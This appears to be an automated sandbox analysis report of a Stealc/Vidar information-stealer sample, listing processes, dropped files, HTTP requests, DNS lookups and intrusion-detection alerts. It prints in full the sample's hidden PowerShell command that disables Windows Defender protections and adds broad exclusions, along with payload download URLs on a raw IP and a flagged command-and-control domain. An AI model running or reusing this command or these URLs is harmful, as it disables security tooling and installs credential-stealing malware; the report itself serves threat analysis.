1504"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command &{ $p=$([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName); $d=[IO.Path]::GetDirectoryName($p); Add-MpPreference -ExclusionPath $d -ea 0; gci $d -fi *.dll | %{Add-MpPreference -ExclusionPath $_.FullName -ea 0}; Set-MpPreference -MAPSReporting 0 -ea 0; Set-MpPreference -SubmitSamplesConsent 2 -ea 0; Set-MpPreference -CloudBlockLevel 0 -ea 0; Set-MpPreference -CloudExtendedTimeout 0 -ea 0; Set-MpPreference -PUAProtection 0 -ea 0; Set-MpPreference -DisableArchiveScanning $true -ea 0; Set-MpPreference -DisableIntrusionPreventionSystem $true -ea 0; Set-MpPreference -DisableBehaviorMonitoring $true -ea 0; Set-MpPreference -DisableBlockAtFirstSeen $true -ea 0; Set-MpPreference -DisableRealtimeMonitoring $true -ea 0; $u=[Environment]::GetFolderPath('UserProfile'); $t=[Environment]::GetFolderPath('LocalApplicationData')+'\Temp'; $a=[Environment]::GetFolderPath('ApplicationData'); $l=[Environment]::GetFolderPath('LocalApplicationData'); @('C:\Windows\Temp','C:\Windows\System32','C:\ProgramData',$u,$t,$a,$l) | %{Add-MpPreference -ExclusionPath $_ -ea 0}; @('powershell','rundll32','cmd','conhost','wscript','cscript','mshta','regsvr32','MsMpEng','svchost','taskhost','explorer') | %{Add-MpPreference -ExclusionProcess $_ -ea 0}; Add-MpPreference -ExclusionExtension '.exe' -ea 0; $ip1='94.153.35.25'; $ip2='85.232.12.133'; @($ip1,$ip2) | %{Add-MpPreference -ExclusionIpAddress $_ -ea 0}; Set-MpPreference -DisableNetworkProtection $true -ea 0; Set-MpPreference -EnableNetworkProtection 0 -ea 0; Set-MpPreference -DisableScanningNetworkFiles $true -ea 0; Set-MpPreference -EnableControlledFolderAccess 0 -ea 0; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -ea 0; exit 123 } C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1724"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4624,i,10864623077996350732,5696893485246414784,262144 --variations-seed-version --mojo-platform-channel-handle=4224 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
1772"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\admin\AppData\Local\noeUpate\4b1071e1" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2188,i,9607764409631395258,12786337579618430811,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --log-level=3 --mojo-platform-channel-handle=1824 /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1860"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2016,i,5777061511908601453,13141288665131146570,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=1840 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
166 615
Read events
166 608
Write events
7
Delete events
0

Modification events

(PID) Process:(6412) slui.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@%SystemRoot%\System32\sppcomapi.dll,-3200
Value:
Software Licensing
(PID) Process:(4692) ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:TS_26b799fa
Value:
BAE9799
Executable files
7
Suspicious files
430
Text files
512
Unknown types
14

Dropped files

PID
Process
Filename
Type
1504powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_in405xvd.yq5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1504powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kuqpszo3.y2d.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5288powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YJB74IV6T9QEK7EWFLXT.tempbinary
MD5:B0F11B76AE968BC5D622DA903C53FEC7
SHA256:AF02EBC1232E2044A944CFB128752BCF137B1315BFEC79F5E2E24984CEE6D437
6236chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RFe3813.TMP
MD5:
SHA256:
5288powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe31ca.TMPbinary
MD5:FB6E503EAFA1E8553CA6761B666DEBAA
SHA256:2ECEABF9CFCC03C4875A7FD29210B60A533B7F03D2AF6231C3FD6D8E46668920
6236chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RFe3823.TMP
MD5:
SHA256:
6236chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old~RFe3823.TMP
MD5:
SHA256:
6236chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
6236chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old
MD5:
SHA256:
6236chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RFe3832.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
355
TCP/UDP connections
146
DNS requests
169
Threats
125

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5276
MoUsoCoreWorker.exe
GET
304
57.153.246.3:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
whitelisted
3352
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
4692
ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe
GET
200
89.125.188.171:80
http://89.125.188.171/nah11/file.exe
NL
executable
743 Kb
unknown
5276
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
6412
slui.exe
POST
500
128.24.231.65:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
US
xml
512 b
whitelisted
5616
powershell.exe
GET
200
89.125.188.171:80
http://89.125.188.171/div/55.ps1
NL
text
3.80 Kb
unknown
6412
slui.exe
POST
500
48.192.1.65:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
US
xml
512 b
whitelisted
3352
svchost.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
4692
ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe
POST
200
172.67.209.149:443
https://dip.matriculador.digital/
US
text
2.81 Kb
unknown
4692
ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe
POST
200
104.21.77.157:443
https://dip.matriculador.digital/
US
text
43 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3352
svchost.exe
57.153.246.3:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
5276
MoUsoCoreWorker.exe
57.153.246.3:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5412
slui.exe
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
184.86.251.27:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
3352
svchost.exe
23.216.77.28:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
3352
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
4692
ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe
89.125.188.171:80
HOSTKEY-AS
NL
unknown
5276
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 57.153.246.3
  • 48.209.138.168
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
www.bing.com
  • 184.86.251.27
  • 184.86.251.22
  • 184.86.251.19
  • 64.7.118.171
  • 64.7.118.170
  • 64.7.118.179
  • 92.123.104.58
  • 92.123.104.65
  • 92.123.104.54
  • 92.123.104.53
  • 92.123.104.12
  • 92.123.104.52
  • 92.123.104.61
  • 92.123.104.51
  • 92.123.104.66
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
google.com
  • 142.250.154.139
  • 142.250.154.113
  • 142.250.154.138
  • 142.250.154.100
  • 142.250.154.101
  • 142.250.154.102
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
telegram.me
  • 149.154.167.99
whitelisted
dip.matriculador.digital
  • 104.21.77.157
  • 172.67.209.149
unknown
clients2.google.com
  • 142.251.20.138
  • 142.251.20.139
  • 142.251.20.113
  • 142.251.20.102
  • 142.251.20.101
  • 142.251.20.100
whitelisted
safebrowsingohttpgateway.googleapis.com
  • 142.251.110.95
  • 142.251.20.95
  • 142.251.13.95
  • 142.251.127.95
  • 142.250.154.95
  • 142.251.14.95
  • 192.178.183.95
whitelisted

Threats

PID
Process
Class
Message
5276
MoUsoCoreWorker.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
5616
powershell.exe
Potentially Bad Traffic
ET INFO PS1 Powershell File Request
5616
powershell.exe
Potentially Bad Traffic
ET HUNTING Generic Powershell Launching Hidden Window
5616
powershell.exe
Potentially Bad Traffic
ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers
A Network Trojan was detected
ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1
4692
ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe
A Network Trojan was detected
ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1
Malware Command and Control Activity Detected
ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2
4692
ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe
Malware Command and Control Activity Detected
ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2
Malware Command and Control Activity Detected
ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1
4692
ab28151431a6c9e8a59a722ad639c1e3c1ed11b33ea1ddc648cbb0b9b6938960.exe
Malware Command and Control Activity Detected
ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1
Process
Message
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\noeUpate directory exists )